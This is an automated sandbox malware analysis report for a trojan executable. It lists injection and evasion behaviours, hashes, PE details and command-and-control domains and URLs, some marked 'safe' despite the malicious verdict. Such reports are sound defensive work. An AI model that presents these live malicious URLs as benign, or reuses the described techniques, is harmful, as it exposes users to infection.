          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 528615 Sample: HkE0tD0g4NXKJfy.exe Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 32 www.vupeliquid.com 2->32 34 www.nbtianzhou.com 2->34 36 vupeliquid.com 2->36 48 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 6 other signatures 2->54 11 HkE0tD0g4NXKJfy.exe 3 2->11         started        signatures3 process4 file5 30 C:\Users\user\...\HkE0tD0g4NXKJfy.exe.log, ASCII 11->30 dropped 66 Tries to detect virtualization through RDTSC time measurements 11->66 15 HkE0tD0g4NXKJfy.exe 11->15         started        signatures6 process7 signatures8 68 Modifies the context of a thread in another process (thread injection) 15->68 70 Maps a DLL or memory area into another process 15->70 72 Sample uses process hollowing technique 15->72 74 Queues an APC in another process (thread injection) 15->74 18 explorer.exe 15->18 injected process9 dnsIp10 38 www.arsels.info 103.224.212.219, 49794, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 18->38 40 www.xcgtsret.com 18->40 42 12 other IPs or domains 18->42 56 System process connects to network (likely due to code injection or exploit) 18->56 22 msdt.exe 12 18->22         started        signatures11 process12 dnsIp13 44 www.jakital.com 22->44 46 AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com 22->46 58 Self deletion via cmd delete 22->58 60 Modifies the context of a thread in another process (thread injection) 22->60 62 Maps a DLL or memory area into another process 22->62 64 Tries to detect virtualization through RDTSC time measurements 22->64 26 cmd.exe 1 22->26         started        signatures14 process15 process16 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          HkE0tD0g4NXKJfy.exe27%ReversingLabsWin32.Trojan.AgentTesla

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.jakital.com/0%Avira URL Cloudsafe
          http://www.jakital.com/sh5d/?Yv=deNwNK4CD/WMHHT4cYNp3s43CKigm652n7BnZRGAFJqHojdiJSlOhFJhA2qOeK3G0%Avira URL Cloudsafe
          http://www.151motors.com/sh5d/?Yv=KHnqZ0TbjHhhriSsr4IC2tQHFpsEpNX6XKtcehIZDPMVzpPTFiaMMZSG67rbMC0Gdpxx&8pZ=MFQX0%Avira URL Cloudsafe
          http://www.suepersoldiers.com/sh5d/?Yv=SDhgbwSt5mB4DODrBIecU0Cn9nI1MHSsH0Hazkrlv9wpSquk3LdmspAinMLs2LJY3gHa&8pZ=MFQX0%Avira URL Cloudsafe
          www.platinumcredit.net/sh5d/0%Avira URL Cloudsafe
          http://www.vupeliquid.com/sh5d/?Yv=Pdn0Hokg7Q3B7dDVtUX5QMohVVbqJZ0HrhWfxUy6sRCS+GjM4sZ5xKohcZ81Ep8iPYLe&8pZ=MFQX0%Avira URL Cloudsafe
          http://www.arsels.info/sh5d/?Yv=U9Dn+H6I1oLCGiFi1oW/bg7Rnic0zjRPtt9AMGb5MRiLdOF7LfbhYF1T4mwo8MTrEy0Q&8pZ=MFQX0%Avira URL Cloudsafe
          http://www.platinumcredit.net/sh5d/?Yv=hy4EQ9RQ8H0Qmf+V5oZYawTzVdNi6YgEsN2g+zlr8kWBt8RwCZI+yMGy7WuYiu2G3qgy&8pZ=MFQX0%Avira URL Cloudsafe
          http://www.electricatrick.com/sh5d/?Yv=bH0MuGY0n47F1S4kOvzCBL0/mw6YL+7138CmEb6WqYz18csJYDgpNmReh/JvI3nBbY8S&8pZ=MFQX0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com
          		52.204.216.132
          		truefalse
            		high
            www.arsels.info
            		103.224.212.219
            		truetrue
              		unknown
              platinumcredit.net
              		34.102.136.180
              		truefalse
                		unknown
                electricatrick.com
                		34.102.136.180
                		truefalse
                  		unknown
                  151motors.com
                  		34.102.136.180
                  		truefalse
                    		unknown
                    vupeliquid.com
                    		34.102.136.180
                    		truefalse
                      		unknown
                      ghs.googlehosted.com
                      		142.250.203.115
                      		truefalse
                        		unknown
                        www.platinumcredit.net
                        		unknown
                        		unknowntrue
                          		unknown
                          www.thefullfledged.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.jakital.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.nbtianzhou.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.xcgtsret.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.151motors.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.suepersoldiers.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.vupeliquid.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.electricatrick.com
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.151motors.com/sh5d/?Yv=KHnqZ0TbjHhhriSsr4IC2tQHFpsEpNX6XKtcehIZDPMVzpPTFiaMMZSG67rbMC0Gdpxx&8pZ=MFQXfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.suepersoldiers.com/sh5d/?Yv=SDhgbwSt5mB4DODrBIecU0Cn9nI1MHSsH0Hazkrlv9wpSquk3LdmspAinMLs2LJY3gHa&8pZ=MFQXfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          www.platinumcredit.net/sh5d/true
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.vupeliquid.com/sh5d/?Yv=Pdn0Hokg7Q3B7dDVtUX5QMohVVbqJZ0HrhWfxUy6sRCS+GjM4sZ5xKohcZ81Ep8iPYLe&8pZ=MFQXfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.arsels.info/sh5d/?Yv=U9Dn+H6I1oLCGiFi1oW/bg7Rnic0zjRPtt9AMGb5MRiLdOF7LfbhYF1T4mwo8MTrEy0Q&8pZ=MFQXtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.platinumcredit.net/sh5d/?Yv=hy4EQ9RQ8H0Qmf+V5oZYawTzVdNi6YgEsN2g+zlr8kWBt8RwCZI+yMGy7WuYiu2G3qgy&8pZ=MFQXfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.electricatrick.com/sh5d/?Yv=bH0MuGY0n47F1S4kOvzCBL0/mw6YL+7138CmEb6WqYz18csJYDgpNmReh/JvI3nBbY8S&8pZ=MFQXfalse
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://www.jakital.com/msdt.exe, 0000000D.00000002.550615461.0000000000453000.00000004.00000020.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jakital.com/sh5d/?Yv=deNwNK4CD/WMHHT4cYNp3s43CKigm652n7BnZRGAFJqHojdiJSlOhFJhA2qOeK3Gmsdt.exe, 0000000D.00000002.550810990.0000000000475000.00000004.00000020.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHkE0tD0g4NXKJfy.exe, 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpfalse
                                            		high

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            142.250.203.115
                                            		ghs.googlehosted.comUnited States
                                            		15169GOOGLEUSfalse
                                            34.102.136.180
                                            		platinumcredit.netUnited States
                                            		15169GOOGLEUSfalse
                                            103.224.212.219
                                            		www.arsels.infoAustralia
                                            		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                            52.204.216.132
                                            		AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.comUnited States
                                            		14618AMAZON-AESUSfalse

                                            General Information

                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                            Analysis ID:528615
                                            Start date:25.11.2021
                                            Start time:15:07:14
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 10m 40s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:HkE0tD0g4NXKJfy.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:25
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@7/1@13/4
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 13.5% (good quality ratio 11.8%)
                                            • Quality average: 71.7%
                                            • Quality standard deviation: 32.9%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            15:08:09API Interceptor20x Sleep call for process: HkE0tD0g4NXKJfy.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            103.224.212.21911#U6708 16#U65e5 BL #U505a#U6cd5 SO NO J624 - #U9577#U5f91ISF DETAILS SO J624.exeGet hashmaliciousBrowse
                                            • www.packyssportsbarandgrill.com/mc6b/?jHED=q6vdABYGr50+mpTbDuVjH2bXmj77a7qtsiv5Ksob526EgQZJ7eJZqZTBsliO0pE1Rz7dNSx2ew==&oDK8=OXptnZkP0zeTKbFp
                                            Company Profile.exeGet hashmaliciousBrowse
                                            • www.alkalineup.info/dc02/?1bNDudv=+kLz+DEprIzY8U30IAWnamgEQgEGLSVbXudac2AKsepjAUwhwqfiCYTJlV+SA+9+XVAU&6lu=KlTl
                                            HIRE SOA NOV.exeGet hashmaliciousBrowse
                                            • www.hugolabin.com/i44q/?7n=YS1dnbOkNaCP7JrmT7p6ZNFgGouLE1kKb8gf8ths3Yir/LKnwdmfPmrhsMehp4wjvOL3&b8DdKN=_b9DpJ
                                            RFQ - 1100195199 - 1100190814.exeGet hashmaliciousBrowse
                                            • www.tattooof.info/nc26/?f48=ChB31lYopjmOZG3U73N52YTWorj0brdWeOA+REOz+6bldw4+nA/cQmaLai4MjdILtj65&4h50R=ABuLcpwXXr-
                                            November 2021 Update RFQ 3271737.exeGet hashmaliciousBrowse
                                            • www.tattooof.info/nc26/?SBZL=ChB31lYopjmOZG3U73N52YTWorj0brdWeOA+REOz+6bldw4+nA/cQmaLai4m8t4Lphy5&D48=c2MHtVyHNxCxXp7
                                            32vCkFTS0X.exeGet hashmaliciousBrowse
                                            • www.movieschor.info/qw2c/?gpt=rM2eMDGM2hRuqtSkQ+YMFWc5A7WJMLl7iFLKjR4Nu2Ciw4jbXpEUgw2kiN/aWqHDCAOD&g2=8pLpO
                                            #U570b#U5de8--#U6cf0#U91d1#U5bf6-EXW - ETC NOV. 5 - SO C360.exeGet hashmaliciousBrowse
                                            • www.packyssportsbarandgrill.com/mc6b/?Fb20Btg=q6vdABYGr50+mpTbDuVjH2bXmj77a7qtsiv5Ksob526EgQZJ7eJZqZTBsmOeoYYOWGSM&R0D49=XvrtZ8lP082
                                            RFQ - 1100195199 - 1100190914.exeGet hashmaliciousBrowse
                                            • www.tattooof.info/nc26/?k8GXjJk=ChB31lYopjmOZG3U73N52YTWorj0brdWeOA+REOz+6bldw4+nA/cQmaLai4MjdILtj65&9rhhPx=IL3h7ZC8a4ITG4S
                                            RFQ - 1100195199 - 1100190914.exeGet hashmaliciousBrowse
                                            • www.tattooof.info/nc26/?I2J=ChB31lYopjmOZG3U73N52YTWorj0brdWeOA+REOz+6bldw4+nA/cQmaLai4m8t4Lphy5&4hL0lT=KZIPBrwH1Nx4PpRp
                                            RFQ_PI02102110.exeGet hashmaliciousBrowse
                                            • www.decorationnews.com/rgv6/?p8eT=YMNzjXdfi635m3k1Gzxopc8L+wUwVg6cKWqi49UbKzMkwhAgUmt+0uJBtX6FQoP4iZ3i&C0=p4sD
                                            PO03214890.exeGet hashmaliciousBrowse
                                            • www.decorationnews.com/rgv6/?I6bdp0F=YMNzjXdfi635m3k1Gzxopc8L+wUwVg6cKWqi49UbKzMkwhAgUmt+0uJBtUW/TpjDhuWz+/MrzQ==&uN90=Wv0xlDNhhL
                                            20210812GLL_pdf.exeGet hashmaliciousBrowse
                                            • www.ptkvoice.com/zrmt/?iZG=ctrCe2mnbuueYdlFChD4/ovjSbegx+fsxvMp2r+zhNsJlDd5OS/NhYw/p1KrtWBZElqC&4hVP=u2JPvzz8
                                            SWIFT001411983HNK.exeGet hashmaliciousBrowse
                                            • www.shortexts.com/epns/?6lS0=dI3Yf9uTZTAbXCF6BbS/gogk1F2wKsRWmNO0p//NNyZfeVIkQt6IT+pUp6SqlYDuC11l&hVW=UjWlVXm0fTLtynY
                                            TNT SHIPPING DOC 6753478364.exeGet hashmaliciousBrowse
                                            • www.alldaazz.com/maw9/?0V0hlZ=XWXsKoTGIm4uHXuwUxI2SWJVNAtoSeX/AD8kJREhnqN4l6QppauIxxnj5QSnUcXcVB4L&OVolp8=AZ9lQ6QHS8EdPrG0
                                            L0CzpAvZC0.docmGet hashmaliciousBrowse
                                            • wnc2sod.com/jivo/neky.php?l=wosam7.cab
                                            http://victoriascrets.comGet hashmaliciousBrowse
                                            • victoriascrets.com/
                                            Nuevo orden.exeGet hashmaliciousBrowse
                                            • www.bdcamp.com/fs8/?Rbd=M6AtZDq0P&sZ8p=NOEji/Y2mGsbH23/deqaMT6z03hOleRIA9g6aYtYA7Z0zE2bvyN9F2FNz4vb/LyrvrKV
                                            http://cootewie.comGet hashmaliciousBrowse
                                            • cootewie.com/

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.comPO11232021.xlsxGet hashmaliciousBrowse
                                            • 54.159.173.74
                                            3543lZhfll.exeGet hashmaliciousBrowse
                                            • 54.211.95.91

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            AMAZON-AESUS2HFJezUWHA.exeGet hashmaliciousBrowse
                                            • 52.20.78.240
                                            QZLQkiS4nj.exeGet hashmaliciousBrowse
                                            • 52.20.78.240
                                            Jx35I5pwgdGet hashmaliciousBrowse
                                            • 54.167.122.21
                                            meerkat.x86Get hashmaliciousBrowse
                                            • 34.228.218.187
                                            invoice copy.pdf.exeGet hashmaliciousBrowse
                                            • 52.200.197.31
                                            mal1.htmlGet hashmaliciousBrowse
                                            • 23.20.158.212
                                            oQANZnrt9dGet hashmaliciousBrowse
                                            • 54.34.104.203
                                            KWDww9OWghGet hashmaliciousBrowse
                                            • 44.207.141.47
                                            TwikaSb2s6Get hashmaliciousBrowse
                                            • 54.204.237.164
                                            TWb3IVgBOQ.exeGet hashmaliciousBrowse
                                            • 35.169.3.110
                                            sora.x86Get hashmaliciousBrowse
                                            • 54.62.131.219
                                            a.dllGet hashmaliciousBrowse
                                            • 44.200.20.85
                                            New Order778880.exeGet hashmaliciousBrowse
                                            • 3.209.180.95
                                            B67M2Q6NeKGet hashmaliciousBrowse
                                            • 44.194.145.165
                                            c0az1l4js3001lsk4xd9n.arm7-20211124-0850Get hashmaliciousBrowse
                                            • 44.207.229.114
                                            c0az1l4js3001lsk4xd9n.arm-20211124-0850Get hashmaliciousBrowse
                                            • 34.231.85.166
                                            0617_1876522156924.docGet hashmaliciousBrowse
                                            • 54.91.59.199
                                            C594188774A2D72B774ACA96EB096C493DBE5C9B599BE.exeGet hashmaliciousBrowse
                                            • 54.83.52.76
                                            x86_64-20211124-0649Get hashmaliciousBrowse
                                            • 54.210.131.199
                                            jLvGTP8xikGet hashmaliciousBrowse
                                            • 34.235.189.214
                                            TRELLIAN-AS-APTrellianPtyLimitedAUpiPvSLcFXV.exeGet hashmaliciousBrowse
                                            • 103.224.212.220
                                            Env#U00edo diciembre.exeGet hashmaliciousBrowse
                                            • 103.224.182.253
                                            IAENMAI.xlsxGet hashmaliciousBrowse
                                            • 103.224.182.210
                                            SecuriteInfo.com.Trojan.Siggen15.46065.1499.exeGet hashmaliciousBrowse
                                            • 103.224.182.246
                                            MDXAR5336e.exeGet hashmaliciousBrowse
                                            • 103.224.212.222
                                            7OjVU04f8q.exeGet hashmaliciousBrowse
                                            • 103.224.212.222
                                            rfq.exeGet hashmaliciousBrowse
                                            • 103.224.212.220
                                            Scan-Copy.docGet hashmaliciousBrowse
                                            • 103.224.182.242
                                            11#U6708 16#U65e5 BL #U505a#U6cd5 SO NO J624 - #U9577#U5f91ISF DETAILS SO J624.exeGet hashmaliciousBrowse
                                            • 103.224.212.219
                                            PO AMO 8100045923.xlsxGet hashmaliciousBrowse
                                            • 103.224.212.221
                                            Company Profile.exeGet hashmaliciousBrowse
                                            • 103.224.212.219
                                            XL9048621.exeGet hashmaliciousBrowse
                                            • 103.224.182.210
                                            goGZ1Tg0WT.exeGet hashmaliciousBrowse
                                            • 103.224.212.220
                                            BwJriVGrt5.exeGet hashmaliciousBrowse
                                            • 103.224.182.208
                                            RQF_190011234.docGet hashmaliciousBrowse
                                            • 103.224.212.221
                                            HIRE SOA NOV.exeGet hashmaliciousBrowse
                                            • 103.224.212.219
                                            RFQ - JAKOB SELMER_pdf.exeGet hashmaliciousBrowse
                                            • 103.224.212.220
                                            Quote request.exeGet hashmaliciousBrowse
                                            • 103.224.212.220
                                            Purchase Order - 10,000MT.exeGet hashmaliciousBrowse
                                            • 103.224.212.221
                                            copy.exeGet hashmaliciousBrowse
                                            • 103.224.182.242

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HkE0tD0g4NXKJfy.exe.log
                                            Process:C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):2239
                                            Entropy (8bit):5.354287817410997
                                            Encrypted:false
                                            SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                                            MD5:913D1EEA179415C6D08FB255AE42B99D
                                            SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                                            SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                                            SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                                            Malicious:true
                                            Reputation:moderate, very likely benign file
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.841777584881155
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:HkE0tD0g4NXKJfy.exe
                                            File size:446976
                                            MD5:fcc2d1cda8d3989feca9c5f5f900e164
                                            SHA1:075de723df172cc93c537d5472ad8025f192ddc8
                                            SHA256:77e1c24ecfa1d339f61b4b8011690425fa0038b3fe32761f5ce8b3126c28c5ad
                                            SHA512:25f45048ee6bc9164177634d6e4b9f4d3aac06d4d305aa25c16eaf8cf2169767f86cd2879ddabe2e49d8fd38b0a50e115b1735da5a4600ec8c1e243bff2b4863
                                            SSDEEP:12288:wdmXM0WMbeBBYMtWpeUjxU9sQ+WYU1y1wjlvixBFm:wdoM0yGptdU9+WYkvjlvi1
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...-O.a..............0.............B.... ........@.. .......................@............@................................

                                            File Icon

                                            Icon Hash:00828e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x46e642
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x619F4F2D [Thu Nov 25 08:54:05 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [ebp+0800000Eh], ch
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x6e5f00x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000x5fc.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
